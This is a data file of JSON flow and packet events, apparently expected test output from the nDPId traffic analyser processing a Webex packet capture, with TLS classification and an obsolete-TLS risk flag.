-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636252,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636252,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAA80SxAAEAGIt4KCAABch3Ki7gMAbtSShPdAAAAAKACOQjlGgAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1444570636255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAAoAZhAABAGIodyHcqLCggAAQG7uAyttewiUkoT3lAS\/\/+vWAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636255,"flow_last_seen":1444570636255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636255,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1444570636255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAA870JAAEAGjzEKCAABrfMETM36AbsKei2zAAAAAKACOQiHkAAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1444570636259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAAoAZlAABAGrO+t8wRMCggAAQG7zfr1hdJMCnottFAS\/\/8j1AAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636259,"flow_last_seen":1444570636259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1444570636259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAA8u9ZAAEAGuzQKCAABQER5ZMv7AbtwVXkkAAAAAKACOQjQ2AAAAgQFtAQCCAoATMLyAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1444570636263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636263,"pkt":"ABoRAAACABoRAAABCABFAAAoAZpAABAGpYVARHlkCggAAQG7y\/uPqobbcFV5JVAS\/\/8eagAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636264,"flow_last_seen":1444570636264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636264,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="} 